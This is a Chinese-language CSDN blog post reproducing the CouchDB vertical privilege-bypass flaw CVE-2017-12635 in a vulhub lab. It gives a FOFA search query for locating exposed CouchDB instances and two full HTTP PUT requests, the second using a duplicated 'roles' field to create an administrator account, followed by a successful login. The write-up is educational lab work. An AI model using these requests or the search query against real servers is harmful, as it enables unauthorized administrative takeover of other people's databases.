【vulhub】Couchdb 垂直权限绕过漏洞(CVE-2017-12635)漏洞复现

最新推荐文章于 2023-09-04 21:46:25 发布
最新推荐文章于 2023-09-04 21:46:25 发布
阅读量983 收藏 1
点赞数 1
分类专栏: vulhub 文章标签: couchdb
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45300786/article/details/120287521
版权

特征

1、端口可能是5984,直接访问端口是couchdb
在这里插入图片描述
在这里插入图片描述

2、访问/_utils目录,网站title是一个红色沙发,title名是Project Fauxton还可以看到couchdb图标
在这里插入图片描述

那么我们根据这些特征,用fofa搜索一下

title="Project Fauxton"

在这里插入图片描述
在这里插入图片描述

利用条件

影响版本:小于 1.7.0 以及 小于 2.1.1

搭建

搭建过程都一样,没有什么坑,楼主这里就不写了。

复现

本次复现版本是2.1.1
在这里插入图片描述
访问该地址
http://192.168.100.34:5984/_utils 跳转到登录页面,不过我们莫得账号密码。在这里插入图片描述
发送如下数据包:

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 192.168.100.34:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 94

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

返回403错误:{"error":"forbidden","reason":"Only _admin may set roles"},只有管理员才能设置Role角色:
在这里插入图片描述
发送一次包含两个roles字段的数据包,即可绕过限制:

注意:1、roles字段必须为,3、已创建的用户,你改密码的话,说不行的。

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: 192.168.100.34:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 94

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

在这里插入图片描述

注意,2、楼主发现:如果你想创建多个用户的话,url中的用户名必须和数据包中的用户名一样!

在这里插入图片描述

注意,3、已创建的用户,你改密码的话,是不行的。

在这里插入图片描述

激动人心的时候到了!既然我们有了新的账号,那么就登进去试试!

输入我们之前创建的账号密码:vulhub:vulhub
http://192.168.100.34:5984/_utils登录成功!
同时即可看到user的数量多了1个
在这里插入图片描述

参考:

复现中的一些原理和排错
https://www.cnblogs.com/foe0/p/11375757.html
搭建过程
https://blog.csdn.net/Aaron_Miller/article/details/97114298
https://blog.csdn.net/JiangBuLiu/article/details/94027581
还有官方的参考。

樱浅沐冰
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2017-12635 Couchdb 垂直权限绕过漏洞复现
weixin_45260839的博客
06-18 974
CVE-2017-12635 Couchdb 垂直权限绕过漏洞复现
CouchDB 漏洞复现 CVE-2017-12635/12636
sechelper的博客
02-11 373
CouchDBCVE-2017-12635和12636联合利用,详细漏洞复现,exp下载获取
vulhubCouchdb 任意命令执行漏洞CVE-2017-12636)
qq_45300786的博客
09-14 627
特征 特征请参考我的上一篇帖子 【vulhubCouchdb 垂直权限绕过漏洞CVE-2017-12635漏洞复现 影响版本:小于 1.7.0 以及 小于 2.1.1 复现 注:复现中的很多东西也要用到这篇帖子,所以先看这篇 【vulhubCouchdb 垂直权限绕过漏洞CVE-2017-12635漏洞复现 再来看本篇帖子 该漏洞是需要登录用户方可触发,如果不知道目标管理员密码,可以利用CVE-2017-12635先增加一个管理员用户。 本次复现是用的版本1.6 http://192.168.1
[Vulfocus解题系列] CouchDB垂直越权漏洞CVE-2017-12635
00勇士王子的博客
07-11 717
漏洞介绍 解题过程 1.打开题目环境 2.使用nc监听端口,用于接收漏洞环境的反弹Shell 3.
CVE-2017-12635Couchdb垂直权限绕过漏洞
浅笑996的博客
11-28 1736
简介 Apache CouchDB是一个开源数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其动态内容展示平台,Credit Suisse用在其内部的商品部门的市场框架,Meebo,用在其社交平台(web和应用程序)。 在2017年年11月15日...
CouchDB漏洞复现
weixin_44259979的博客
10-07 788
CouchDB漏洞复现
CouchDB 未授权访问漏洞总结
qq_45746681的博客
10-05 1093
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录前言一、CouchDB 未授权访问漏洞是什么?二、复现1.搭建环境2.漏洞反弹shell的exp防御方法 前言 复现常见的未授权访问漏洞 加强理解 一、CouchDB 未授权访问漏洞是什么? Apache CouchDB是一个开源数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为存储格式,JavaScript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。应用广泛,如BBC用在其
Couchdb 垂直权限绕过漏洞CVE-2017-12635复现
锋刃科技的博客
05-06 3250
简介 Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为“完全拥抱web的数据库”。它是一个使用JSON作为数据存储格式,javascript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。 影响版本 版本<1.7.0以及 <2.1.1 环境搭建 https://github.com/vulhub/vulhub/tree/master/couchdb/CVE-2017-12635 编译及启动环境: ...
Apache CouchDB信息泄露漏洞(CVE-2023-26268)通告
05-05
Apache CouchDB 信息泄露漏洞(CVE-2023-26268)通告 Apache CouchDB 是一个开源的 NoSQL 文档数据库,以基于 JSON 的文档格式收集和存储数据,提供了高可用性和高可靠性。近日,深信服安全团队监测到 Apache ...
CouchDBClient:CouchDB客户端-.NET客户端框架,用于使用CouchDB
02-03
CouchDBClient(CouchDB .NET客户端) CouchDBClient是用于从.NET代码使用CouchDB的框架。 它抽象化并简化了CouchDB的用法,因此您可以轻松地从应用程序代码中使用它。 在框架下掩盖了使用纯json和http请求/响应的...
guile-couchdb:指导方案的Couchdb
02-04
1. 连接CouchDB:通过`make-couchdb-client`函数建立到CouchDB服务器的连接,指定URL和认证信息。 2. 创建数据库:使用`create-database`函数创建一个新的数据库,如`create-database '("mydb")`。 3. 存储文档:将...
couchdb-github-action:在Github Action上运行CouchDB
02-05
CouchDB-Github-Action是将开源文档数据库CouchDB集成到GitHub Actions中的工具,它使得开发者能够在持续集成(Continuous Integration, CI)流程中利用CouchDB进行测试、部署和其他数据库相关的任务。GitHub ...
couchdb-orm:一个简单的CouchDB ORM
02-04
"couchdb-orm"项目就是这样一个专门为CouchDB设计的ORM框架,它旨在为Crystal编程语言提供方便、直观的数据库访问接口。 CouchDB是一款基于JSON文档的分布式数据库,其核心特性包括强大的文档存储、视图(View)...
Kitura-CouchDB:用于Kitura的CouchDB适配器
02-03
Kitura-CouchDB是专为Kitura框架设计的一个CouchDB适配器,它使得在Swift后端开发中集成CouchDB数据库变得简单易行。Kitura是一个强大的、开源的服务器端Swift框架,用于构建可扩展和安全的网络应用程序。而CouchDB...
vulhub-CVE-2017-12635垂直漏洞复现
最新发布
m0_58265086的博客
09-04 109
是一个特殊的路径,用于访问 CouchDB 的 Web 界面工具。通过在浏览器中输入该网址,可以打开 CouchDBFauxton 管理界面,其中包含了对数据库进行管理的各种功能,例如创建数据库、查看和编辑文档、设计视图等。4.然后一次性发送两个roles绕过管理员限制。,只有管理员才能设置Role角色。
CVE-2017-12635 垂直权限绕过
m0_63034363的博客
07-09 500
CVE-2017-12635 垂直权限绕过主要是因为Erlang和JavaScript对JSON解析方式的不同造就此漏洞
CouchDB垂直越权漏洞CVE-2017-12635
Kevin's Blog
07-24 1827
文章目录一、漏洞原理二、触发条件三、漏洞场景 / 挖掘思路四、漏洞复现4.1 漏洞环境4.2 启动环境4.3 访问环境五、防御措施 一、漏洞原理 二、触发条件 三、漏洞场景 / 挖掘思路 四、漏洞复现 4.1 漏洞环境 4.2 启动环境 4.3 访问环境 五、防御措施 ...
Couchdb 垂直权限绕过漏洞CVE-2017-12635
一枚不知名的Java程序猿
10-02 950
vulhub漏洞复现学习过程
CouchDB常用的漏洞利用方法
05-27
以下是一些常用的 CouchDB 漏洞利用方法: 1. 未授权访问漏洞:如果 CouchDB 未正确配置,攻击者可以轻易地访问和控制 CouchDB 服务器,从而获取敏感信息或造成破坏。 2. 认证绕过漏洞:攻击者可以利用某些漏洞或弱口令等方式,绕过身份验证机制,从而访问和控制 CouchDB 服务器。 3. 注入漏洞:攻击者可以向 CouchDB 服务器发送恶意数据,利用注入漏洞,执行任意代码,从而控制服务器。 4. 配置错误漏洞:如果 CouchDB 服务器的配置存在错误,攻击者可以利用这些错误,绕过安全措施,访问和控制 CouchDB 服务器。 5. 拒绝服务攻击漏洞:攻击者可以通过发送大量的恶意请求,或利用某些漏洞,让 CouchDB 服务器崩溃或无法响应,从而导致服务停止或数据丢失。 总之,为了保护 CouchDB 服务器的安全,需要加强对服务器的安全管理和监控,及时修补安全漏洞,提高人员的安全意识和技能。此外,建议使用更加安全的身份验证机制,例如 OAuth、LDAP 等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值